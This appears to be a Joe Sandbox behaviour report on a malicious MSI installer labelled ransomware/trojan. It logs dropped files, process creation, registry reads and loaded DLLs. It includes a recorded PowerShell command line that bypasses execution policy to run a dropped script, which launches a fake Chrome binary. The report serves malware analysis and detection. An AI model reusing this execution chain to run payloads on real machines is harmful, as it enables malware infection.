Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.23 entropy: 7.99805207356	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.24 entropy: 7.99355397795	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.25 entropy: 7.99713455209	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.26 entropy: 7.9975483379	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.27 entropy: 7.99500009348	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.28 entropy: 7.99787066785	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.29 entropy: 7.9932411667	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.3 entropy: 7.997978048	Jump to dropped file

Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\4b3b27.msi	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI3CCD.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI3D2C.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI3D4C.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI3D6C.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI3DBC.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\inprogressinstallinfo.ipi	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\SourceHash{B95F3E55-F3A2-459E-ACB1-42A9918E3822}	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI3E49.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI435B.tmp	Jump to behavior

Source: C:\Windows\System32\msiexec.exe

File deleted: C:\Windows\Installer\MSI3CCD.tmp

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_04032015	3_2_04032015
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Code function: 8_2_00007FFE007AE8D0	8_2_00007FFE007AE8D0
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Code function: 8_2_00007FFE007DC0E8	8_2_00007FFE007DC0E8
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Code function: 8_2_00007FFE007C1120	8_2_00007FFE007C1120
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Code function: 8_2_00007FFE007C4A10	8_2_00007FFE007C4A10
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Code function: 8_2_00007FFE007D69A0	8_2_00007FFE007D69A0
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Code function: 8_2_00007FFE007AB2C8	8_2_00007FFE007AB2C8
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Code function: 8_2_00007FFE007D3300	8_2_00007FFE007D3300
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Code function: 8_2_00007FFE007B6B3C	8_2_00007FFE007B6B3C
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Code function: 8_2_00007FFE007AFA60	8_2_00007FFE007AFA60
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Code function: 8_2_00007FFE007CBA60	8_2_00007FFE007CBA60
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Code function: 8_2_00007FFE007C5290	8_2_00007FFE007C5290
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Code function: 8_2_00007FFE007B2430	8_2_00007FFE007B2430
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Code function: 8_2_00007FFE007BB3A0	8_2_00007FFE007BB3A0
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Code function: 8_2_00007FFE007DAD0C	8_2_00007FFE007DAD0C
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Code function: 8_2_00007FFE007BC500	8_2_00007FFE007BC500
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Code function: 8_2_00007FFE007B9C50	8_2_00007FFE007B9C50
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Code function: 8_2_00007FFE007B6464	8_2_00007FFE007B6464
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Code function: 8_2_00007FFE007C2CA0	8_2_00007FFE007C2CA0
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Code function: 8_2_00007FFE007C7714	8_2_00007FFE007C7714
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Code function: 8_2_00007FFE007C4E50	8_2_00007FFE007C4E50
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Code function: 8_2_00007FFE007BD660	8_2_00007FFE007BD660
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Code function: 8_2_00007FFE007C1680	8_2_00007FFE007C1680
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Code function: 8_2_00007FFE007DFEBA	8_2_00007FFE007DFEBA
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Code function: 8_2_00007FFE007AC6B0	8_2_00007FFE007AC6B0
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Code function: 8_2_00007FFE007CAFD0	8_2_00007FFE007CAFD0
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Code function: 8_2_00007FFE007D57E0	8_2_00007FFE007D57E0
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Code function: 8_2_00007FFE007DC7E0	8_2_00007FFE007DC7E0
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Code function: 8_2_00007FFE007D3808	8_2_00007FFE007D3808
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Code function: 8_2_00007FFE007BE810	8_2_00007FFE007BE810
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Code function: 8_2_00007FFE007D5010	8_2_00007FFE007D5010
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Code function: 8_2_00007FFE007DA038	8_2_00007FFE007DA038
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Code function: 8_2_00007FFE007C5F40	8_2_00007FFE007C5F40
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Code function: 8_2_00007FFE007B97A0	8_2_00007FFE007B97A0
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Code function: 8_2_00007FFE007B67BC	8_2_00007FFE007B67BC
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Code function: 8_2_00007FFE007AD7B0	8_2_00007FFE007AD7B0
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Code function: 8_2_00007FFE1A457238	8_2_00007FFE1A457238
Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe	Code function: 9_2_00007FF63EE5E820	9_2_00007FF63EE5E820
Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe	Code function: 9_2_00007FF63EE037E0	9_2_00007FF63EE037E0
Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe	Code function: 9_2_00007FF63EDB1BD0	9_2_00007FF63EDB1BD0
Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe	Code function: 9_2_00007FF63EF35CB0	9_2_00007FF63EF35CB0
Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe	Code function: 9_2_00007FF63EDBEBA0	9_2_00007FF63EDBEBA0
Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe	Code function: 9_2_00007FF63EE96B80	9_2_00007FF63EE96B80
Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe	Code function: 9_2_00007FF63EE9DB70	9_2_00007FF63EE9DB70
Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe	Code function: 9_2_00007FF63EEC5B40	9_2_00007FF63EEC5B40
Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe	Code function: 9_2_00007FF63EDEDD30	9_2_00007FF63EDEDD30
Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe	Code function: 9_2_00007FF63EE2DC80	9_2_00007FF63EE2DC80
Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe	Code function: 9_2_00007FF63EE47880	9_2_00007FF63EE47880
Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe	Code function: 9_2_00007FF63EDBC440	9_2_00007FF63EDBC440
Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe	Code function: 9_2_00007FF63EDCC840	9_2_00007FF63EDCC840
Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe	Code function: 9_2_00007FF63EF35C30	9_2_00007FF63EF35C30
Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe	Code function: 9_2_00007FF63EE92980	9_2_00007FF63EE92980
Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe	Code function: 9_2_00007FF63EE5FD80	9_2_00007FF63EE5FD80
Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe	Code function: 9_2_00007FF63EEF095C	9_2_00007FF63EEF095C
Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe	Code function: 9_2_00007FF63EE00330	9_2_00007FF63EE00330
Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe	Code function: 9_2_00007FF63EE7FF00	9_2_00007FF63EE7FF00
Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe	Code function: 9_2_00007FF63EDFB6F0	9_2_00007FF63EDFB6F0
Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe	Code function: 9_2_00007FF63EDBE2A0	9_2_00007FF63EDBE2A0
Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe	Code function: 9_2_00007FF63EEC4A90	9_2_00007FF63EEC4A90
Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe	Code function: 9_2_00007FF63EE59690	9_2_00007FF63EE59690
Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe	Code function: 9_2_00007FF63EE90280	9_2_00007FF63EE90280
Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe	Code function: 9_2_00007FF63EE62280	9_2_00007FF63EE62280
Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe	Code function: 9_2_00007FF63EDF9260	9_2_00007FF63EDF9260
Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe	Code function: 9_2_00007FF63EDC1270	9_2_00007FF63EDC1270
Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe	Code function: 9_2_00007FF63EECF660	9_2_00007FF63EECF660

Source: Joe Sandbox View	Dropped File: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.14 6B3265B2F82E206BED8B6CD56C2A3F0FA9D8FD027E19A9713DA618B177D9264B
Source: Joe Sandbox View	Dropped File: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.50 34397DE1D9DC94AAA08CA1D267B64B0E12CCABA008BABE6F592E563F00DC874B

Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe	Code function: String function: 00007FF63EDE4F50 appears 31 times
Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe	Code function: String function: 00007FF63EF14A90 appears 188 times

Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe

Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2500 -s 580

Source: xmpp.dll.1.dr

Static PE information: Resource name: RT_VERSION type: MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79

Source: chrome.exe.8.dr	Static PE information: Number of sections : 12 > 10
Source: xmpp.dll.1.dr	Static PE information: Number of sections : 11 > 10
Source: chrome_pwa_launcher.exe.8.dr	Static PE information: Number of sections : 13 > 10
Source: chrome_elf.dll.8.dr	Static PE information: Number of sections : 14 > 10

Source: Br_i421i2-2481-125_754864.msi	Binary or memory string: OriginalFilenameAICustAct.dllF vs Br_i421i2-2481-125_754864.msi
Source: Br_i421i2-2481-125_754864.msi	Binary or memory string: OriginalFilenamePowerShellScriptLauncher.dllF vs Br_i421i2-2481-125_754864.msi

Source: chrome_elf.dll.8.dr

Static PE information: Section: .dim ZLIB complexity 0.999755117306231

Source: classification engine

Classification label: mal80.rans.troj.evad.winMSI@12/188@0/0

Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe

Code function: 8_2_00007FFE007AA690 GetDiskFreeSpaceExW,_invalid_parameter_noinfo_noreturn,

8_2_00007FFE007AA690

Source: C:\Windows\System32\msiexec.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\CML3E73.tmp

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7720:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2500

Source: C:\Windows\System32\msiexec.exe

File created: C:\Windows\TEMP\~DF737FEAFB5F47DDDF.TMP

Jump to behavior

Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales			Jump to behavior
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\Br_i421i2-2481-125_754864.msi"
Source: unknown	Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 182CBD29A8DE3C0ACD2328E3D85CE97B
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss43F5.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi43E2.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr43E3.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr43E4.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe "C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe"
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Process created: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe
Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2500 -s 580
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 182CBD29A8DE3C0ACD2328E3D85CE97B	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss43F5.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi43E2.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr43E3.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr43E4.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe "C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Process created: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe	Jump to behavior

Source: C:\Windows\System32\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: srclient.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: spp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.ui.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windowmanagementapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: inputhost.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.ui.immersive.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
